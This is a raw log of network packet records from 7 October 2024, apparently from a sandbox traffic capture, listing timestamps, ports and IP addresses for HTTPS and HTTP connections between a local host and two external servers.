Oct 7, 2024 03:15:40.830607891 CEST	49839	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:40.830622911 CEST	443	49839	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:40.830632925 CEST	49839	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:40.830637932 CEST	443	49839	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:40.834234953 CEST	49844	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:40.834284067 CEST	443	49844	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:40.834388971 CEST	49844	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:40.834568024 CEST	49844	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:40.834585905 CEST	443	49844	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:40.870466948 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:40.875402927 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:40.893528938 CEST	443	49840	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:40.893676043 CEST	443	49840	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:40.893981934 CEST	49840	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:40.893981934 CEST	49840	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:40.893981934 CEST	49840	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:40.897057056 CEST	49845	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:40.897110939 CEST	443	49845	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:40.897196054 CEST	49845	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:40.897397041 CEST	49845	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:40.897414923 CEST	443	49845	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:40.927525043 CEST	443	49841	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:40.927592993 CEST	443	49841	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:40.927706003 CEST	443	49841	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:40.927880049 CEST	49841	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:40.927880049 CEST	49841	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:40.927880049 CEST	49841	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:40.930412054 CEST	49846	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:40.930438995 CEST	443	49846	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:40.930526972 CEST	49846	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:40.930695057 CEST	49846	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:40.930720091 CEST	443	49846	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:40.964849949 CEST	443	49842	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:40.965563059 CEST	49842	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:40.965615034 CEST	443	49842	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:40.966145039 CEST	49842	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:40.966151953 CEST	443	49842	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:41.062968969 CEST	443	49842	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:41.063141108 CEST	443	49842	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:41.063277960 CEST	49842	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:41.065505028 CEST	49842	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:41.065522909 CEST	443	49842	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:41.065706968 CEST	49842	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:41.065715075 CEST	443	49842	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:41.077243090 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:41.077296019 CEST	49847	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:41.077354908 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:41.077361107 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:41.077368975 CEST	443	49847	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:41.077408075 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:41.077425003 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:41.077464104 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:41.077469110 CEST	49847	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:41.077493906 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:41.077498913 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:41.077516079 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:41.077532053 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:41.077549934 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:41.077567101 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:41.077586889 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:41.077600956 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:41.077617884 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:41.077635050 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:41.077670097 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:41.077686071 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:41.077702045 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:41.077733040 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:41.077738047 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:41.077776909 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:41.077800989 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:41.078888893 CEST	49847	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:41.078911066 CEST	443	49847	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:41.168498039 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:41.168627024 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:41.187625885 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:41.187688112 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:41.187719107 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:41.187740088 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:41.187769890 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:41.187783957 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:41.187807083 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:41.187836885 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:41.187843084 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:41.187876940 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:41.187882900 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:41.187906981 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:41.187930107 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:41.187951088 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:41.187982082 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:41.187984943 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:41.188036919 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:41.188046932 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:41.188080072 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:41.188103914 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:41.188132048 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:41.188133955 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:41.188165903 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:41.188183069 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:41.188218117 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:41.188226938 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:41.188251972 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:41.188280106 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:41.188290119 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:41.188313007 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:41.188323021 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:41.188347101 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:41.188355923 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:41.188395023 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:41.188395977 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:41.188421965 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:41.188427925 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:41.188448906 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:41.188461065 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:41.188474894 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:41.188513994 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:41.188517094 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:41.188548088 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:41.188568115 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:41.188580990 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:41.188605070 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:41.188613892 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:41.188637018 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:41.188647032 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:41.188673019 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:41.188699007 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:41.196485996 CEST	49840	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:41.196531057 CEST	443	49840	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:41.243611097 CEST	49841	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:41.243648052 CEST	443	49841	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:41.298405886 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:41.298455000 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:41.298511982 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:41.298566103 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:41.298566103 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:41.298609018 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:41.298624039 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:41.298664093 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:41.298665047 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:41.298717976 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:41.298718929 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:41.298758984 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:41.298775911 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:41.298811913 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:41.298815966 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:41.298867941 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:41.298868895 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:41.298903942 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:41.298922062 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:41.298955917 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:41.298955917 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:41.299009085 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:41.299042940 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:41.299042940 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:41.299066067 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:41.299097061 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:41.299102068 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:41.299135923 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:41.299154043 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:41.299171925 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:41.299191952 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:41.299204111 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:41.299225092 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:41.299238920 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:41.299258947 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:41.299272060 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:41.299293995 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:41.299305916 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:41.299326897 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:41.299340963 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:41.299362898 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:41.299375057 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:41.299397945 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:41.299431086 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:41.299446106 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:41.299463987 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:41.299487114 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:41.299496889 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:41.299516916 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:41.299531937 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:41.299552917 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:41.299565077 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:41.299587011 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:41.299598932 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:41.299619913 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:41.299633026 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:41.299654961 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:41.299665928 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:41.299685001 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:41.299699068 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:41.299720049 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:41.299732924 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:41.299753904 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:41.299767971 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:41.299787998 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:41.299803019 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:41.299823046 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:41.299835920 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:41.299858093 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:41.299870014 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:41.299890995 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:41.299902916 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:41.299925089 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:41.299937963 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:41.299958944 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:41.299971104 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:41.299992085 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:41.300005913 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:41.300029993 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:41.300035954 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:41.300067902 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:41.300101995 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:41.300112963 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:41.300136089 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:41.300153017 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:41.300169945 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:41.300204039 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:41.300216913 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:41.300240040 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:41.300271988 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:41.300291061 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:41.300307035 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:41.300324917 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:41.300342083 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:41.300363064 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:41.300396919 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:41.409153938 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:41.409202099 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:41.409262896 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:41.409318924 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:41.409356117 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:41.409389019 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:41.409410000 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:41.409463882 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:41.409516096 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:41.409552097 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:41.409562111 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:41.409562111 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:41.409579039 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:41.409603119 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:41.409605026 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:41.409636974 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:41.409651995 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:41.409677029 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:41.409692049 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:41.409725904 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:41.409737110 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:41.409770012 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:41.409787893 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:41.409833908 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:41.409838915 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:41.409872055 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:41.409887075 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:41.409914970 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:41.409925938 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:41.409975052 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:41.409977913 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:41.410012007 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:41.410020113 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:41.410053968 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:41.410062075 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:41.410106897 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:41.410114050 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:41.410146952 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:41.410159111 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:41.410187960 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:41.410201073 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:41.410245895 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:41.410254002 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:41.410288095 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:41.410299063 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:41.410320997 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:41.410334110 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:41.410372019 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:41.410375118 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:41.410408974 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:41.410427094 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:41.410454035 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:41.410461903 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:41.410512924 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:41.410512924 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:41.410547018 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:41.410559893 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:41.410594940 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:41.410598993 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:41.410645008 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:41.410650969 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:41.410684109 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:41.410698891 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:41.410727978 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:41.410742044 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:41.410778999 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:41.410801888 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:41.410824060 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:41.410855055 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:41.410866022 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:41.410898924 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:41.410907030 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:41.410939932 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:41.410952091 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:41.410976887 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:41.410984993 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:41.411010981 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:41.411020994 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:41.411043882 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:41.411056042 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:41.411077023 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:41.411088943 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:41.411109924 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:41.411117077 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:41.411143064 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:41.411153078 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:41.411179066 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:41.411185026 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:41.411212921 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:41.411247969 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:41.411258936 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:41.411282063 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:41.411309958 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:41.411315918 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:41.411335945 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:41.411350012 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:41.411360025 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:41.411401987 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:41.411401987 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:41.411438942 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:41.411448956 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:41.411473989 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:41.411484957 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:41.411506891 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:41.411520004 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:41.411539078 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:41.411550045 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:41.411571980 CEST	80	49782	95.164.90.97	192.168.2.5
